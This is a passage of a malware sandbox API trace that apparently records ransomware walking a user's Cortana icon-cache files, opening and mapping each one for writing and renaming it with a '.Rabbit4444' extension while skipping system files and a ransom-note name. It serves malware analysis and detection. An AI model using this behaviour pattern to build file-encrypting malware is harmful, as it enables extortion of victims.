(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5202C284-5887-45AA-A00F-FDE7E88E85ED}", dwFileAttributes=0x0) returned 1 [0067.900] lstrlenW (lpString="{5202C284-5887-45AA-A00F-FDE7E88E85ED}") returned 38 [0067.900] lstrlenW (lpString="Rabbit4444") returned 10 [0067.900] lstrcmpiW (lpString1="7E88E85ED}", lpString2="Rabbit4444") returned -1 [0067.901] lstrlenW (lpString=".dll") returned 4 [0067.901] lstrcmpiW (lpString1="5ED}", lpString2=".dll") returned 1 [0067.901] lstrlenW (lpString=".lnk") returned 4 [0067.901] lstrcmpiW (lpString1="5ED}", lpString2=".lnk") returned 1 [0067.901] lstrlenW (lpString=".ini") returned 4 [0067.901] lstrcmpiW (lpString1="5ED}", lpString2=".ini") returned 1 [0067.901] lstrlenW (lpString=".sys") returned 4 [0067.901] lstrcmpiW (lpString1="5ED}", lpString2=".sys") returned 1 [0067.901] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5202C284-5887-45AA-A00F-FDE7E88E85ED}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5202c284-5887-45aa-a00f-fde7e88e85ed}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.901] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.901] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15921186513) returned 1 [0067.901] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0067.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0067.901] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.902] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.903] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.904] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.904] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.904] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.904] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15921441825) returned 1 [0067.904] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0067.904] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0067.904] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.904] CloseHandle (hObject=0x29c) returned 1 [0067.904] CloseHandle (hObject=0x280) returned 1 [0067.904] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5202C284-5887-45AA-A00F-FDE7E88E85ED}.Rabbit4444") returned 156 [0067.904] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5202C284-5887-45AA-A00F-FDE7E88E85ED}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5202c284-5887-45aa-a00f-fde7e88e85ed}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5202C284-5887-45AA-A00F-FDE7E88E85ED}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5202c284-5887-45aa-a00f-fde7e88e85ed}.rabbit4444"), dwFlags=0x1) returned 1 [0067.905] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98965b15, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98965b15, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{530FD476-4A81-49DE-B228-C202EACB8F92}", cAlternateFileName="{530FD~1")) returned 1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2="Rabbit4444.exe") returned -1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2=".") returned 1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2="..") returned 1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2="windows") returned -1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2="bootmgr") returned -1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2="pagefile.sys") returned -1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2="boot") returned -1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2="ids.txt") returned -1 [0067.905] lstrcmpiW (lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}", lpString2="NTUSER.DAT") returned -1 [0067.905] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{530FD476-4A81-49DE-B228-C202EACB8F92}" | out: lpString1="{530FD476-4A81-49DE-B228-C202EACB8F92}") returned="{530FD476-4A81-49DE-B228-C202EACB8F92}" [0067.905] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{530FD476-4A81-49DE-B228-C202EACB8F92}", dwFileAttributes=0x0) returned 1 [0067.909] lstrlenW (lpString="{530FD476-4A81-49DE-B228-C202EACB8F92}") returned 38 [0067.909] lstrlenW (lpString="Rabbit4444") returned 10 [0067.909] lstrcmpiW (lpString1="2EACB8F92}", lpString2="Rabbit4444") returned -1 [0067.909] lstrlenW (lpString=".dll") returned 4 [0067.909] lstrcmpiW (lpString1="F92}", lpString2=".dll") returned 1 [0067.909] lstrlenW (lpString=".lnk") returned 4 [0067.909] lstrcmpiW (lpString1="F92}", lpString2=".lnk") returned 1 [0067.909] lstrlenW (lpString=".ini") returned 4 [0067.909] lstrcmpiW (lpString1="F92}", lpString2=".ini") returned 1 [0067.909] lstrlenW (lpString=".sys") returned 4 [0067.909] lstrcmpiW (lpString1="F92}", lpString2=".sys") returned 1 [0067.909] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{530FD476-4A81-49DE-B228-C202EACB8F92}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{530fd476-4a81-49de-b228-c202eacb8f92}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.909] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.909] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15922002849) returned 1 [0067.909] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0067.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0067.909] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.912] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.913] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.913] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.913] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.913] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.913] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15922419345) returned 1 [0067.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0067.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0067.914] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.914] CloseHandle (hObject=0x29c) returned 1 [0067.914] CloseHandle (hObject=0x280) returned 1 [0067.914] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{530FD476-4A81-49DE-B228-C202EACB8F92}.Rabbit4444") returned 156 [0067.914] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{530FD476-4A81-49DE-B228-C202EACB8F92}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{530fd476-4a81-49de-b228-c202eacb8f92}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{530FD476-4A81-49DE-B228-C202EACB8F92}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{530fd476-4a81-49de-b228-c202eacb8f92}.rabbit4444"), dwFlags=0x1) returned 1 [0067.915] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380da02c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x380da02c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", cAlternateFileName="{53F21~1")) returned 1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2="Rabbit4444.exe") returned -1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2=".") returned 1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2="..") returned 1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2="windows") returned -1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2="bootmgr") returned -1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2="pagefile.sys") returned -1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2="boot") returned -1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2="ids.txt") returned -1 [0067.915] lstrcmpiW (lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}", lpString2="NTUSER.DAT") returned -1 [0067.915] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{53F21F3D-8237-4CEC-A18E-8D26D784916C}" | out: lpString1="{53F21F3D-8237-4CEC-A18E-8D26D784916C}") returned="{53F21F3D-8237-4CEC-A18E-8D26D784916C}" [0067.915] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{53F21F3D-8237-4CEC-A18E-8D26D784916C}", dwFileAttributes=0x0) returned 1 [0067.915] lstrlenW (lpString="{53F21F3D-8237-4CEC-A18E-8D26D784916C}") returned 38 [0067.915] lstrlenW (lpString="Rabbit4444") returned 10 [0067.915] lstrcmpiW (lpString1="6D784916C}", lpString2="Rabbit4444") returned -1 [0067.915] lstrlenW (lpString=".dll") returned 4 [0067.915] lstrcmpiW (lpString1="16C}", lpString2=".dll") returned 1 [0067.915] lstrlenW (lpString=".lnk") returned 4 [0067.915] lstrcmpiW (lpString1="16C}", lpString2=".lnk") returned 1 [0067.915] lstrlenW (lpString=".ini") returned 4 [0067.915] lstrcmpiW (lpString1="16C}", lpString2=".ini") returned 1 [0067.915] lstrlenW (lpString=".sys") returned 4 [0067.915] lstrcmpiW (lpString1="16C}", lpString2=".sys") returned 1 [0067.916] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{53F21F3D-8237-4CEC-A18E-8D26D784916C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{53f21f3d-8237-4cec-a18e-8d26d784916c}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.916] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.916] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15922691341) returned 1 [0067.916] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0067.916] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.917] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.918] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.918] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.918] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.918] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.918] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.919] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.919] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.919] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.919] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15922942057) returned 1 [0067.919] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.919] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0067.919] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.919] CloseHandle (hObject=0x29c) returned 1 [0067.919] CloseHandle (hObject=0x280) returned 1 [0067.919] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{53F21F3D-8237-4CEC-A18E-8D26D784916C}.Rabbit4444") returned 156 [0067.919] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{53F21F3D-8237-4CEC-A18E-8D26D784916C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{53f21f3d-8237-4cec-a18e-8d26d784916c}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{53F21F3D-8237-4CEC-A18E-8D26D784916C}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{53f21f3d-8237-4cec-a18e-8d26d784916c}.rabbit4444"), dwFlags=0x1) returned 1 [0067.920] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98c14584, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98c14584, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5534E575-0865-48C0-B802-046F4903AAF0}", cAlternateFileName="{5534E~1")) returned 1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2="Rabbit4444.exe") returned -1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2=".") returned 1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2="..") returned 1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2="windows") returned -1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2="bootmgr") returned -1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2="pagefile.sys") returned -1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2="boot") returned -1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2="ids.txt") returned -1 [0067.920] lstrcmpiW (lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}", lpString2="NTUSER.DAT") returned -1 [0067.920] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{5534E575-0865-48C0-B802-046F4903AAF0}" | out: lpString1="{5534E575-0865-48C0-B802-046F4903AAF0}") returned="{5534E575-0865-48C0-B802-046F4903AAF0}" [0067.920] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5534E575-0865-48C0-B802-046F4903AAF0}", dwFileAttributes=0x0) returned 1 [0067.920] lstrlenW (lpString="{5534E575-0865-48C0-B802-046F4903AAF0}") returned 38 [0067.920] lstrlenW (lpString="Rabbit4444") returned 10 [0067.920] lstrcmpiW (lpString1="F4903AAF0}", lpString2="Rabbit4444") returned -1 [0067.920] lstrlenW (lpString=".dll") returned 4 [0067.920] lstrcmpiW (lpString1="AF0}", lpString2=".dll") returned 1 [0067.920] lstrlenW (lpString=".lnk") returned 4 [0067.920] lstrcmpiW (lpString1="AF0}", lpString2=".lnk") returned 1 [0067.920] lstrlenW (lpString=".ini") returned 4 [0067.920] lstrcmpiW (lpString1="AF0}", lpString2=".ini") returned 1 [0067.920] lstrlenW (lpString=".sys") returned 4 [0067.921] lstrcmpiW (lpString1="AF0}", lpString2=".sys") returned 1 [0067.921] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5534E575-0865-48C0-B802-046F4903AAF0}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5534e575-0865-48c0-b802-046f4903aaf0}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.921] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.921] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15923168822) returned 1 [0067.921] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.921] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0067.921] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0067.921] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.922] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.923] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15923426744) returned 1 [0067.924] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0067.924] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0067.924] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.924] CloseHandle (hObject=0x29c) returned 1 [0067.924] CloseHandle (hObject=0x280) returned 1 [0067.924] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5534E575-0865-48C0-B802-046F4903AAF0}.Rabbit4444") returned 156 [0067.924] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5534E575-0865-48C0-B802-046F4903AAF0}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5534e575-0865-48c0-b802-046f4903aaf0}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5534E575-0865-48C0-B802-046F4903AAF0}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5534e575-0865-48c0-b802-046f4903aaf0}.rabbit4444"), dwFlags=0x1) returned 1 [0067.925] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98d1f5fb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98d1f5fb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5567FA0F-AE06-4D14-B697-1F596323F48A}", cAlternateFileName="{5567F~1")) returned 1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", 